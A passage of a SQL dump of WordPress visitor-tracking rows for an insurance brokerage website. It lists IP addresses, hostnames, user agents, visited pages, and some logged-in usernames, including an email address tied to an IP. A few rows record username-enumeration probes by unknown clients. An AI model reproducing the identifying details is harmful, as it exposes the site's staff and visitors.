1080','','','','Chaya','','0','0',0),(28202,'0b_f897972c7725038f84ff73edc657d1a4','1462994134','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(28205,'0b_f897972c7725038f84ff73edc657d1a4','1462994137','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(28206,'0b_f897972c7725038f84ff73edc657d1a4','1462994141','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(28209,'0b_f897972c7725038f84ff73edc657d1a4','1462994147','108.58.88.178','ool-6c3a58b2.static.optonline.net','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(28212,'0b_458450540fe063b6f79e9cbe0e820234','1462994943','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(28215,'0b_f59f923d91e71c00442a75c21345c375','1462994965','40.77.167.94','msnbot-40-77-167-94.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(28218,'0b_a5d48b7c72e2e546d889eb7757f455a2','1462995033','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/6.0 (compatible; MSIE 7.0a1; Windows NT 5.2; SV1)','http://coinsruss.com/','',0,'Win2003','IE 7','ua','','','','','','','0','0',0),(28220,'0b_a5d48b7c72e2e546d889eb7757f455a2','1462995033','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/6.0 (compatible; MSIE 7.0a1; Windows NT 5.2; SV1)','http://coinsruss.com/','',0,'Win2003','IE 7','ua','','','','','','','0','0',0),(28221,'0b_454e2fe0f037b14307b5f97988f03f0b','1462995288','176.31.39.23','176.31.39.23','/contact/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(28223,'0b_969fcf1407187cacea0d43b8bd9d3509','1462996182','66.249.66.21','crawl-66-249-66-21.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(28226,'0b_43e53efd57970593fee90c856bb6cc31','1462996419','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(28227,'0b_43e53efd57970593fee90c856bb6cc31','1462996420','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(28230,'0b_43e53efd57970593fee90c856bb6cc31','1462996432','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(28233,'0b_43e53efd57970593fee90c856bb6cc31','1462996636','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/wp-admin/admin.php?page=wassup&last=7','',0,'Win7','Chrome 50','us','1920 x 1080','','','','admin','','0','51',0),(28235,'0b_43e53efd57970593fee90c856bb6cc31','1462996637','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','admin','','0','0',0),(28236,'0b_c96a84788e49b9b2fd31a8261e44a7b5','1462996747','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28238,'0b_c96a84788e49b9b2fd31a8261e44a7b5','1462996748','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28241,'0b_412715e961827bdc9d5e7171866c4664','1462996854','38.88.200.218','38.88.200.218','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 50','us','','Google','','','','','0','0',0),(28244,'0b_959a6d3874bee3677aad452abdba18f3','1462996963','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(28245,'0b_2689538534cf64ad4ebd4bd70b0d75f6','1462997923','104.153.227.133','104.153.227.133','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36','','',0,'MacOSX','Chrome 48','us','1920 x 1200','','','','','','0','0',0),(28248,'0b_2689538534cf64ad4ebd4bd70b0d75f6','1462997938','104.153.227.133','104.153.227.133','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36','http://www.empireins.com/','',0,'MacOSX','Chrome 48','us','1920 x 1200','','','','','','0','0',0),(28250,'0b_2689538534cf64ad4ebd4bd70b0d75f6','1462997971','104.153.227.133','104.153.227.133','/about-us/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36','http://www.empireins.com/','',0,'MacOSX','Chrome 48','us','1920 x 1200','','','','','','0','0',0),(28251,'0b_bd19b1601f584852211504dd106b3b6c','1462998279','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(28254,'0b_bd19b1601f584852211504dd106b3b6c','1462998282','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(28256,'0b_38ada63f56604627dfe63cf84c8ec9b2','1462998306','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(28259,'0b_61c874386c5e37624dc81257da63409d','1462998512','50.74.240.14','mail.kentco.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1280 x 1024','','','','','','0','0',0),(28262,'0b_61c874386c5e37624dc81257da63409d','1462998514','50.74.240.14','mail.kentco.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1280 x 1024','','','','','','0','0',0),(28263,'0b_61c874386c5e37624dc81257da63409d','1462998521','50.74.240.14','mail.kentco.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1280 x 1024','','','','','','0','0',0),(28265,'0b_e97371a203f9151acac8860b23bd1ba9','1462998861','63.223.124.15','63.223.124.15','/robots.txt','Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/23.0','','',0,'Win8','Firefox 23','us','','','Unknown Spider','','','','0','0',0),(28266,'0b_4f088d3e48ecbf8722439886993b7299','1462998872','217.18.247.71','217.18.247.71','/','Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/22.0','','',0,'Win8','Firefox 22','us','','','','','','','0','0',0),(28268,'0b_24f998d02e1769eb643d067a5ee16092','1462998894','141.8.143.235','spider-141-8-143-235.yandex.com','/agent-tools/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(28269,'0b_59d5e5c7debdfc58134721ea683852de','1462999110','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28272,'0b_59d5e5c7debdfc58134721ea683852de','1462999111','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28274,'0b_61c874386c5e37624dc81257da63409d','1462999153','50.74.240.14','mail.kentco.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 50','us','1280 x 1024','','','','ABRAVER@KENTCO.COM','','0','51',0),(28275,'0b_492cddf13ce6ca7788191ea78bd6d2ed','1463000242','89.144.58.72','retty.dealsnegotiate.com','/case-status/','Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27','','',0,'Win7','Version 5','us','','','','','','','0','0',0),(28278,'0b_884366781d8b2ce5c3599af91f407200','1463000242','89.144.43.15','rank-1.trilogyfiscal.com','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0','','',0,'Win7 x64','Firefox 31','us','','','','','','','0','0',0),(28280,'0b_623ad30d349165c6876cf6bffbf45a73','1463000244','206.217.195.71','usa1.datatr.com','/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0','','',0,'Win7 x64','Firefox 21','us','','','','','','','0','0',0),(28283,'0b_b4c255c5570c5d229b24b76bd6a2dc43','1463000247','185.35.21.155','185.35.21.155','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36','','',0,'Win7','Chrome 36','us','','','','','','','0','0',0),(28286,'0b_72034de8d559fe45fb941cd6043cdc60','1463000257','216.21.233.2','216.21.233.2','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','ca','','','','','','','0','0',0),(28287,'0b_59370ddaf169d7ed397c10cf1c4789b6','1463000244','216.198.220.109','216.198.220.109','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36','','',0,'Win7','Chrome 41','us','','','','','','','0','0',0),(28290,'0b_2dd57bd909085779ef4b181c643da37e','1463000269','185.75.240.175','185.75.240.175','/robots.txt','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36','','',0,'Linux','Chrome 33','us','','','Unknown Spider','','','','0','0',0),(28292,'0b_727ff579226fb68805df7eed3947d462','1463000269','80.79.117.66','80.79.117.66','/robots.txt','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0','','',0,'Win7 x64','Firefox 21','us','','','Unknown Spider','','','','0','0',0),(28295,'0b_b442e83cb5b9f3a431ae0ac01e4e67a9','1463000278','107.155.195.51','107.155.195.51','/robots.txt','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36','','',0,'Linux','Chrome 33','us','','','Unknown Spider','','','','0','0',0),(28296,'0b_42f93dda2770f3c07b013aca7c3ec419','1463000307','71.35.164.9','71-35-164-9.tukw.qwest.net','/forms/','Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko','','',0,'Win8','','us','','','','','','','0','0',0),(28299,'0b_07b18b7390a369ee80ca64f2bce2f991','1463000288','162.255.153.139','162.255.153.139','/about-us/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36','','',0,'Win8','Chrome 30','us','','','','','','','0','0',0),(28301,'0b_49dfb6cc1aaa28b16c3e02005a3baefe','1463000314','96.46.56.37','clink-96-46-56-37.usa.gwga.atlantaweekly.info','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0','','',0,'Win7 x64','Firefox 21','us','','','','','','','0','0',0),(28304,'0b_72034de8d559fe45fb941cd6043cdc60','1463000310','216.21.233.2','216.21.233.2','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','ca','','','','','','','0','0',0),(28305,'0b_addfcf64e6f6c9c0279b7bd98e5e5297','1463000320','184.100.174.1','184-100-174-1.ptld.qwest.net','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E)','','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(28308,'0b_f51bc72fc505c46f04a26140c8a6429a','1463000315','91.223.159.134','91.223.159.134','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0','','',0,'Win8','Firefox 36','us','','','','','','','0','0',0),(28310,'0b_55f25105109bf19ce3fbeea541d4de68','1463000327','207.195.228.135','207-195-228-135.static.webcoretech.com','/home/feed/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36','','',0,'Linux','Chrome 33','us','','','','','','','0','0',0),(28313,'0b_f4d4f23d2a9c930df752f71ebfd230fd','1463000321','217.79.248.175','217.79.248.175','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20130514 Firefox/21.0','','',0,'Win8 x64','Firefox 21','us','','','','','','','0','0',0),(28314,'0b_8e005d6654333f3c5f2ea01fcc89366c','1463000328','217.18.245.165','217.18.245.165','/insentives/','Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36','','',0,'Win8','Google Chrome','us','','','','','','','0','0',0),(28317,'0b_bceb41eca0c0f733196c1e288031ad3d','1463000338','85.93.24.195','host25.oddinvestment.com','/comments/feed/','Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0','','',0,'Win7','Firefox 21','us','','','','','','','0','0',0),(28320,'0b_59d5e5c7debdfc58134721ea683852de','1463000340','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28323,'0b_dbeeb75554e72a300934cbd73433a0bf','1463000331','185.35.21.193','185.35.21.193','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.1; SV1; .NET CLR 2.8.52393; WOW64; en-US)','','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(28325,'0b_8489dfa69d61554783800f51aba8b371','1463000340','85.93.10.54','85.93.10.54','/carriers/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','us','','','','','','','0','0',0),(28328,'0b_59d5e5c7debdfc58134721ea683852de','1463000350','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28329,'0b_1db1ede4793855b4de5a25bfa85fa36d','1463000341','208.72.117.77','208.72.117.77','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.1.76908; WOW64; en-US)','','',0,'WinVista x64','IE 9','us','','','','','','','0','0',0),(28331,'0b_59d5e5c7debdfc58134721ea683852de','1463000377','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28334,'0b_59d5e5c7debdfc58134721ea683852de','1463000378','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28335,'0b_8ca3d156c428b81adfe15f05fbd63861','1463001131','205.178.130.14','205.178.130.14','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://csrtools.prod.netsol.com/UserBaseProductList.jsp','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(28337,'0b_8ca3d156c428b81adfe15f05fbd63861','1463001144','205.178.130.14','205.178.130.14','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(28340,'0b_667eeafc58cc57e5f8774ef97215878b','1463001436','205.178.130.14','205.178.130.14','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://csrtools.prod.netsol.com/productDetail.jsp?product=WN.D.165525701&action=init','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(28341,'0b_667eeafc58cc57e5f8774ef97215878b','1463001446','205.178.130.14','205.178.130.14','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(28344,'0b_b7f13079f35542fe30d13e3a30691559','1463001503','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(28347,'0b_753ab58c0654cb781d20407a3e368caf','1463001556','5.153.233.130','5.153.233.130','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(28350,'0b_753ab58c0654cb781d20407a3e368caf','1463001566','5.153.233.130','5.153.233.130','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(28352,'0b_753ab58c0654cb781d20407a3e368caf','1463001576','5.153.233.130','5.153.233.130','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(28353,'0b_89a76df408d8b6c94ffd027be3e7a540','1463002206','96.46.54.62','client-96-46-54-62.gwusa.il.chicagoconnect.info','/robots.txt','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A','','',0,'MacOSX','Safari 7046','us','','','Unknown Spider','','','','0','0',0),(28355,'0b_95e8d70c4f91f416a1f661d13d226bb7','1463002206','217.18.247.98','217.18.247.98','/robots.txt','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)','','',0,'Win7','IE 9','us','','','Unknown Spider','','','','0','0',0),(28358,'0b_026a4f8f980b067d88b433458a02d355','1463002216','217.172.40.207','reverse.lightup.net','/?p=9','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36','','',0,'Win8','Chrome 41','us','','','','','','','0','0',0),(28359,'0b_437e37a1b332afe2c417f50df104a8f4','1463002207','149.5.113.85','149.5.113.85','/robots.txt','Mozilla/5.0 (Linux; U; Android 2.3; en-us) AppleWebKit/999+ (KHTML, like Gecko) Safari/999.9','','',0,'Android 2','Safari 999','us','','','Unknown Spider','','','','0','0',0),(28361,'0b_0077cfb9868db1393d2ebb5fd7782e0d','1463002220','80.79.119.142','80.79.119.142','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/13.0.782.215)','','',0,'Win7','IE 9','us','','','','','','','0','0',0),(28364,'0b_ac363a46ea23a0d2126ee05eda23469c','1463002221','91.223.159.97','91.223.159.97','/?p=8','Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+','','',0,'BlackBerry','BlackBerry','us','','','','','','','0','0',0),(28367,'0b_1c02dca93032a28d048f2362650b365b','1463002236','93.186.168.193','reverse.valueserver.de','/contact/','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:16.0.1) Gecko/20121011 Firefox/21.0.1','','',0,'Win7 x64','Firefox 21','de','','','','','','','0','0',0),(28368,'0b_95eebe229b39d13b2e79699da2264130','1463002230','178.18.252.211','178.18.252.211','/about-us/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','','',0,'MacOSX','Chrome 37','us','','','','','','','0','0',0),(28371,'0b_0b514e74a57f061b7ff5620d84b3a955','1463002245','95.143.41.153','mailout-153.freemails.biz','/?p=306','Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0','','',0,'Linux','Firefox 28','us','','','','','','','0','0',0),(28374,'0b_482a696544aefeed86fa7df2b5cef047','1463002239','23.226.220.101','23.226.220.101','/?p=181','Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00','','',0,'Win2003','Opera 12','us','','','','','','','0','0',0),(28377,'0b_58bd037a5f0b7c12890cce99cdf55945','1463002247','185.75.243.165','185.75.243.165','/aig-releases-new-term-rates-and-re-enters-ny/feed/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0','','',0,'MacOSX','Firefox 21','us','','','','','','','0','0',0),(28379,'0b_676a0bb080bb13f17b400c8069f3884c','1463002251','69.61.18.95','69.61.18.95','/licensing-contracting/','Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14','','',0,'WinVista','Opera 9','us','','','','','','','0','0',0),(28380,'0b_baab69ce3e6695bc799d59059834bacc','1463002262','37.247.124.104','37.247.124.104','/?p=283','Mozilla/5.0 (Windows NT 6.2; rv:21.0) Gecko/20130326 Firefox/21.0','','',0,'Win8','Firefox 21','us','','','','','','','0','0',0),(28382,'0b_4d8bcf52370040401fb64143f34bf49b','1463002256','23.239.166.127','23.239.166.127','/agent-tools/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36','','',0,'WinXP','Chrome 35','us','','','','','','','0','0',0),(28383,'0b_d6725bad3f64f20dafd72a0221c8fa5a','1463002272','89.144.34.19','89.144.34.19','/?p=277','Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:27.0) Gecko/20121011 Firefox/27.0','','',0,'Win8 x64','Firefox 27','us','','','','','','','0','0',0),(28385,'0b_64ea774019261d6e9e2dcee74e8ae345','1463002282','63.223.124.153','cp.servnode.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0.1) Gecko/20121011 Firefox/21.0.1','','',0,'Win8 x64','Firefox 21','us','','','','','','','0','0',0),(28388,'0b_55ba8d772e5d17c8786c54c5ceb10246','1463002288','12.180.55.133','12.180.55.133','/?p=185','Opera/9.80 (Windows NT 6.0; U; en) Presto/2.8.99 Version/11.10','','',0,'WinVista','Opera 9','us','','','','','','','0','0',0),(28389,'0b_781b2fbb0def52837e2eb02165c963a4','1463002288','217.79.247.212','217.79.247.212','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)','','',0,'Win7','IE 9','us','','','','','','','0','0',0),(28391,'0b_6a265050a8a31efd1f55802fe1b1c08d','1463002303','71.35.178.230','71-35-178-230.tukw.qwest.net','/carriers/','Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00','','',0,'Win2003','Opera 12','us','','','','','','','0','0',0),(28392,'0b_2e013d3c84cf6c5f04d381a647938b0a','1463002298','80.79.123.10','80.79.123.10','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0','','',0,'MacOSX','Firefox 33','us','','','','','','','0','0',0),(28395,'0b_b29b46276dfadf6d596c16b4867b504f','1463002310','104.200.68.138','104.200.68.138','/?p=10','Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','','',0,'OpenBSD','Chrome 36','us','','','','','','','0','0',0),(28397,'0b_667cdee22d3990e9dea575737f4ce294','1463002319','185.75.240.180','185.75.240.180','/about-us/feed/','Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130401 Firefox/21.0','','',0,'WinXP','Firefox 21','us','','','','','','','0','0',0),(28398,'0b_11be01c74df78c7552b54ba19df9897c','1463002304','23.239.163.156','23.239.163.156','/licensing-contracting/feed/','Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/22.0','','',0,'Win8','Firefox 22','us','','','','','','','0','0',0),(28401,'0b_3b515e998f2b621cae83cd100b8f4de8','1463002334','95.143.47.143','medinged.net','/?p=311','Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02','','',0,'WinXP','Opera 